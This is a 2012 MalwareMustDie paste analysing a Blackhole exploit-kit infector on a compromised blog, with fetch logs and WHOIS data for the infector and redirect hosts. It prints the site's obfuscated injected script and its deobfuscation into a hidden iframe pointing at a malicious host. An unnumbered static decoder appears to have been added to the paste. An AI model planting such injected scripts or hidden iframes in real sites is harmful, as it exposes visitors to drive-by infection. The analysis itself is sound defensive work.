unixfreaxjp

#Blackhole Infector pairs 173.236.136.84 and 67.208.74.71

Oct 3rd, 2012
  1. /*==========================================
  2. Blackhole server infector monitor analysis..
  3. Detected from: 2012-09-27
  4. Recorded to : 2012-10-03
  5. Research of #MalwareMustDie
  6. - we don't steal, we seek by our own resource,
  7. we expose, to raise malware awareness, not to mess other's work
  8. we share, to all malware victims, to end the blindness of malware victimization
  9. who are fooled by many security protection craps..
  10. this is at least a good deed in our limited/short internet uptimes
  11. Researched by @unixfreaxjp
  12. Oct 3rd, 23:31 GMT+9
  13. ==========================================*/
  14.  
  15. // This Blackhole infector actively infects via various spam campaigns:
  16. // the linked URLs lead to 173.236.136.84, and from 173.236.136.84 visitors are
  17. // redirected to another evil host, 67.208.74.71, which has a long
  18. // history of Blackhole infections.
  19. //
  20. // The actors are so clever to play hide and seek with us,
  21. // what we expose is what we monitored in the past days,
  22. // I hope authorities in US can do something to nail these
  23. // infectors' scheme, by intercepting these hosts' activity to get a
  24. // link to the actors.
  25. //
  26. // #MalwareMustDie!
  27.  
  28.  
  29. // Infector background
  30.  
  31. IP: 173.236.136.84 / Host: www.teamrainert.com
  32.  
  33. NetRange: 173.236.128.0 - 173.236.255.255
  34. CIDR: 173.236.128.0/17
  35. OriginAS: AS26347
  36. NetName: DREAMHOST-BLK10
  37. NetHandle: NET-173-236-128-0-1
  38. Parent: NET-173-0-0-0-0
  39. NetType: Direct Allocation
  40. RegDate: 2010-03-30
  41. Updated: 2012-03-02
  42. Ref: http://whois.arin.net/rest/net/NET-173-236-128-0-1
  43.  
  44. OrgName: New Dream Network, LLC
  45. OrgId: NDN
  46. Address: 417 Associated Rd.
  47. Address: PMB #257
  48. City: Brea
  49. StateProv: CA
  50. PostalCode: 92821
  51. Country: US
  52. RegDate: 2001-04-17
  53. Updated: 2012-09-27
  54. Ref: http://whois.arin.net/rest/org/NDN
  55.  
  56. //----------------------------------------------------------------------------
  57.  
  58. // Infector history (source spamdb/blacklists)
  59.  
  60. 2012-09-27 06:41:09 http://teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months/
  61. 2012-09-27 06:41:10 http://www.teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months/
  62. 2012-09-27 14:49:08 http://teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months
  63. 2012-09-29 02:31:44 http://www.teamrainert.com/?cat=
  64. 2012-10-01 13:53:37 http://www.teamrainert.com/
  65. 2012-10-01 21:28:35 http://teamrainert.com/?cat=
  66.  
  67. //--------------------------------------------------------------------------
  68.  
  69. // One shot to kill...
  70.  
  71. --21:59:58-- http://www.teamrainert.com/
  72. => `index.html'
  73. Resolving www.teamrainert.com... 173.236.136.84
  74. Connecting to www.teamrainert.com|173.236.136.84|:80... connected.
  75. HTTP request sent, awaiting response... 200 OK
  76. Length: 46,621 (46K) [text/html]
  77. 100%[====================================>] 46,621 9.71K/s ETA 00:00
  78. 22:00:04 (9.70 KB/s) - `index.html' saved [46621/46621]
  79.  
  80. //-------------------------------------------------------------------------
  81.  
  82. // detection alerts...
  83.  
  84. [2012-10-03 22:08:14] [HTTP] URL: http://www.teamrainert.com/ (Status: 200, Referrer: None)
  85. [2012-10-03 22:08:17] [Window] Eval argument length > 64 (812)
  86.  
  87. //-------------------------------------------------------------------------
  88.  
  89. // evilcode found...
  90.  
  91. <script>h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';} n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!19.5!60.5!5.5!3.5!3.5!3.5!51.5!50!56!47.5!53.5!49.5!56!19!19.5!28.5!5.5!3.5!3.5!61.5!15!49.5!53!56.5!49.5!15!60.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!58.5!56!51.5!57!49.5!19!16!29!51.5!50!56!47.5!53.5!49.5!15!56.5!56!48.5!29.5!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5!15!58.5!51.5!49!57!51!29.5!18.5!23.5!23!18.5!15!51!49.5!51.5!50.5!51!57!29.5!18.5!23.5!23!18.5!15!56.5!57!59.5!53!49.5!29.5!18.5!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!28!51!51.5!49!49!49.5!54!28.5!55!54.5!56.5!51.5!57!51.5!54.5!54!28!47.5!48!56.5!54.5!53!57.5!57!49.5!28.5!53!49.5!50!57!28!23!28.5!57!54.5!55!28!23!28.5!18.5!30!29!22.5!51.5!50!56!47.5!53.5!49.5!30!16!19.5!28.5!5.5!3.5!3.5!61.5!5.5!3.5!3.5!50!57.5!54!48.5!57!51.5!54.5!54!15!51.5!50!56!47.5!53.5!49.5!56!19!19.5!60.5!5.5!3.5!3.5!3.5!58!47.5!56!15!50!15!29.5!15!49!54.5!48.5!57.5!53.5!49.5!54!57!22!48.5!56!49.5!47.5!57!49.5!33.5!53!49.5!53.5!49.5!54!57!19!18.5!51.5!50!56!47.5!53.5!49.5!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!56.5!56!48.5!18.5!21!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5!19.5!28.5!50!22!56.5!57!59.5!53!49.5!22!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!29.5!18.5!51!51.5!49!49!49.5!54!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!55!54.5!56.5!51.5!57!51.5!54.5!54!29.5!18.5!47.5
!48!56.5!54.5!53!57.5!57!49.5!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!53!49.5!50!57!29.5!18.5!23!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!57!54.5!55!29.5!18.5!23!18.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!58.5!51.5!49!57!51!18.5!21!18.5!23.5!23!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!51!49.5!51.5!50.5!51!57!18.5!21!18.5!23.5!23!18.5!19.5!28.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!22!47.5!55!55!49.5!54!49!32.5!51!51.5!53!49!19!50!19.5!28.5!5.5!3.5!3.5!61.5"["split"]("a!".substr(1));for(i=6-2-1-2-1;i!=605;i++){j=i;if(st)ss=ss+st[f](-h*(1+1*n[j]));}if(zz)q=ss;if(t)e(""+q);</script>
  92.  
  93. //-------------------------------------------------------------------------
  94.  
  95. // deobfs step 1 of evil code...
  96.  
  97. if (document.getElementsByTagName('body')[0]){
  98. iframer();
  99. }
  100. else {
  101. document.write(
  102. "<iframe src='http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2' " +
  103. "width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>" +
  104. "</iframe>");
  105. }
  106. function iframer(){
  107. var f = document.createElement('iframe');
  108. f.setAttribute('src', 'http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2');
  109. f.style.visibility = 'hidden';
  110. f.style.position = 'absolute';
  111. f.style.left = '0';
  112. f.style.top = '0';
  113. f.setAttribute('width', '10');
  114. f.setAttribute('height', '10');
  115. document.getElementsByTagName('body')[0].appendChild(f);
  116. }
  117. //-------------------------------------------------------------------------
  118.  
  119. // 2nd deobfs evil code.. evil iframe came up..
  120.  
  121. <iframe src='http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2'
  122. width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>
  123. </iframe>
  124.  
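The two deobfuscation steps above can be reproduced statically, without letting the page call eval(). The following is an added example, not code from the original paste: the function names are hypothetical, the "!" separator and the `parseInt('012')/5` key are taken from the evilcode, and SAMPLE is a constructed wrapper around a token excerpt copied from that payload. It assumes the payload relies on ES3-style octal parsing, under which `parseInt('012')` is 10 and the multiplier is 2; an ES5+ engine reads 12, gets 2.4, and decodes garbage.

```javascript
// Added example: static decoder for the "evilcode" above. Nothing is eval()'d.
// SAMPLE is a constructed wrapper; its tokens are an excerpt of the paste's payload.
const SAMPLE =
  "<script>h=-parseInt('012')/5;n=\"" +
  "56.5!56!48.5!29.5!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51" +
  "!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56" +
  "!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5" +
  "\"[\"split\"](\"a!\".substr(1));</script>";

// ES3-era engines read a leading-zero string as octal; ES5+ engines read decimal.
function legacyParseInt(s) {
  return /^0[0-7]+$/.test(s) ? parseInt(s, 8) : parseInt(s, 10);
}

// Recover the multiplier (-h in the payload) under both parseInt behaviours.
function multipliers(source) {
  const m = /parseInt\(\s*['"](\d+)['"]\s*\)\s*\/\s*(\d+)/.exec(source);
  if (!m) return null;
  return {
    legacy: legacyParseInt(m[1]) / Number(m[2]),
    modern: parseInt(m[1], 10) / Number(m[2]),
  };
}

// Pull the long "!"-separated numeric string literal out of the script.
function extractTokens(source) {
  const m = /["']((?:\d+(?:\.\d+)?!){10,}\d+(?:\.\d+)?)["']/.exec(source);
  return m ? m[1].split("!").map(Number) : [];
}

// Same arithmetic as the payload loop: fromCharCode(-h * (1 + n[j])).
function decode(tokens, mult) {
  return tokens.map((t) => String.fromCharCode(mult * (1 + t))).join("");
}

// Decode under both interpretations and list the URLs in the readable result.
function analyze(source) {
  const mult = multipliers(source);
  const tokens = extractTokens(source);
  if (!mult || tokens.length === 0) return null;
  const decoded = decode(tokens, mult.legacy);
  return {
    multiplier: mult.legacy,
    decoded,
    decodedModern: decode(tokens, mult.modern),
    urls: decoded.match(/https?:\/\/[^\s'"<>]+/g) || [],
  };
}

console.log(analyze(SAMPLE));
```

Run against the full evilcode string, the same functions yield the step 1 script; the extracted URL list is what goes into blocklists and proxy-log searches.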
  125. //-------------------------------------------------------------------------
  126.  
  127. // fetch config, settings: 3 modes: w/o tor, tor, "gatling fetching gun"
  128.  
  129. user-agent="Mozilla/5.0 (X11; U; NetBSD"
  130. referer="http://www.teamrainert.com/"
  131. target="http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2"
  132.  
  133. // without tor
  134.  
  135. --22:29:04-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
  136. => `index.html@go=2'
  137. Resolving hjkllllhhggggfffvvbbbn.findhere.org... 67.208.74.71
  138. Connecting to hjkllllhhggggfffvvbbbn.findhere.org|67.208.74.71|:80... connected.
  139.  
  140. HTTP request sent, awaiting response... 301 Moved Permanently
  141. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
  142. --22:29:05-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
  143. => `redir_not_found.shtml@hjkllllhhggggfffvvbbbn.findhere.org.1'
  144. Resolving domainpark.sitelutions.com... 67.208.74.12
  145. Connecting to domainpark.sitelutions.com|67.208.74.12|:80... connected.
  146. HTTP request sent, awaiting response... 200 OK
  147. Length: unspecified [text/html]
  148. 22:29:06 (57.20 MB/s) - `redir_not_found.shtml@hjkllllhhggggfffvvbbbn.findhere.org.1' saved [5680]
  149.  
  150. // with tor
  151.  
  152. --2012-10-03 22:33:17-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
  153. Resolving localhost (localhost)... 127.0.0.1, ::1
  154. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  155. Proxy request sent, awaiting response... 301 Moved Permanently
  156. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
  157. --2012-10-03 22:33:18-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
  158. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  159. Proxy request sent, awaiting response... 200 OK
  160. Length: unspecified [text/html]
  161. Saving to: `index.html?go=2'
  162. 2012-10-03 22:33:20 (30.4 KB/s) - `index.html?go=2' saved [5680]
  163.  
  164. // gatling "fetching" gun
  165.  
  166. --22:36:00-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
  167. => `index.html?go=2'
  168. Resolving hjkllllhhggggfffvvbbbn.findhere.org... 67.208.74.71
  169. Connecting to hjkllllhhggggfffvvbbbn.findhere.org|67.208.74.71|:80... connected.
  170. HTTP request sent, awaiting response... 301 Moved Permanently
  171. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
  172. --22:36:01-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
  173. => `redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org'
  174. Resolving domainpark.sitelutions.com... 67.208.74.12
  175. Connecting to domainpark.sitelutions.com|67.208.74.12|:80... connected.
  176. HTTP request sent, awaiting response... 200 OK
  177. Length: unspecified [text/html]
  178. 22:36:02 (25.03 KB/s) - `redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org' saved [5680]
  179.  
  180.  
  181. // --lynx snips----
  182.  
  183. Redirection Not Found hjkllllhhggggfffvvbbbn.findhere.org
  184.  
  185. The website hjkllllhhggggfffvvbbbn.findhere.org is (or was) utilizing the Sitelutions Redirection Engine.
  186. Unfortunately, the URL has been entered incorrectly, or
  187. the site has been deleted by its owner. Below are some of our other services and features that we offer.
  188.  
  189. //----------------------------------------------------
  190.  
  191. // alternative infector urls...
  192.  
  193. --2012-10-03 22:57:27-- http://teamrainert.com/?cat=
  194. Resolving localhost (localhost)... 127.0.0.1, ::1
  195. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  196. Proxy request sent, awaiting response... 301 Moved Permanently
  197. Location: http://www.teamrainert.com/?cat= [following]
  198. --2012-10-03 22:57:29-- http://www.teamrainert.com/?cat=
  199. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  200. Proxy request sent, awaiting response... 301 Moved Permanently
  201. Location: http://www.teamrainert.com/ [following]
  202. --2012-10-03 22:57:31-- http://www.teamrainert.com/
  203. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  204. Proxy request sent, awaiting response... 200 OK
  205. Length: 43829 (43K) [text/html]
  206. Saving to: `index.html?cat='
  207. 100%[========>] 43,829 30.0K/s in 1.4s
  208. 2012-10-03 22:57:35 (30.0 KB/s) - `index.html?cat=' saved [43829/43829] <--- same page as per the lynx snip above
  209.  
  210. //result...
  211. currently CLEAN Site... at least FOR NOW, and so other urls too...
  212.  
  213.  
  214. //-----------------------------------------------------------------
  215.  
  216. The history of reported cases of redir target host: 67.208.74.71
  217.  
  268.  
  269. //----------------------------------------------------------------
  270.  
  271. // I picked one: http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  272. // Settings: Adobe Reader: 8.0, Java: 1.6_10
  273.  
  274. --2012-10-03 23:14:18-- http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  275. Resolving localhost (localhost)... 127.0.0.1, ::1
  276. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  277. Proxy request sent, awaiting response... 301 Moved Permanently
  278. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?koqjhmmhcm.byinter.net [following]
  279. --2012-10-03 23:14:20-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?koqjhmmhcm.byinter.net
  280. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  281. Proxy request sent, awaiting response... 200 OK
  282. Length: unspecified [text/html]
  283. Saving to: `main.php?page=c9ee61ed42809775'
  284. 2012-10-03 23:14:22 (12.8 KB/s) - `main.php?page=c9ee61ed42809775' saved [5654]
  285.  
  286. // Found zips.. except the link to the google commercial...
  287.  
  288. <!doctype html>
  289. <html>
  290.  
  291. <body>
  292. <script>
  293. google_ad_channel = "";
  294. google_ad_client = "pub-2844624690808284";
  295. google_ad_format = "728x90_as";
  296. google_ad_height = 90;
  297. google_ad_type = "text_image";
  298. google_ad_width = 728;
  299. google_color_bg = "FFFFFF";
  300. google_color_border = "FFFFFF";
  301. google_color_link = "0000FF";
  302. google_color_text = "000000";
  303. google_color_url = "008000";
  304. google_show_ads_impl = true;
  305. google_unique_id = 1;
  306. google_async_iframe_id = "aswift_0";
  307. google_start_time = 1348970528339;
  308. google_expand_experiment = "none";
  309. google_bpp = 8;
  310. </script>
  311. <script src="http://pagead2.googlesyndication.com/pagead/js/r20120919/r20120730/show_ads_impl.js">
  312. </script>
  313. </body>
  314.  
  315. </html>
  316.  
  317. //----------------------------------------
  318.  
  319. // while WHOIS showed...
  320.  
  321. IP: 67.208.74.71
  322.  
  323. InfoRelay Online Systems, Inc. INFORELAY-NETBLOCK01 (NET-67-208-64-0-1) 67.208.64.0 - 67.208.95.255
  324. InfoRelay Online Systems, Inc. INFORELAY-LBSERVERS-02 (NET-67-208-74-64-1) 67.208.74.64 - 67.208.74.95
  325.  
  326. Routings...
  327.  
  328. ASN | Prefix | ASName | CN | Domain | ISP of an IP Address
  329. 33597 | 67.208.74.0/23 | INFORELAY | US | INFORELAY.NET | INFORELAY ONLINE SYSTEMS INC.
  330.  
  331. //------ end of analysis ------
  332.  
  333. #MalwareMustDie!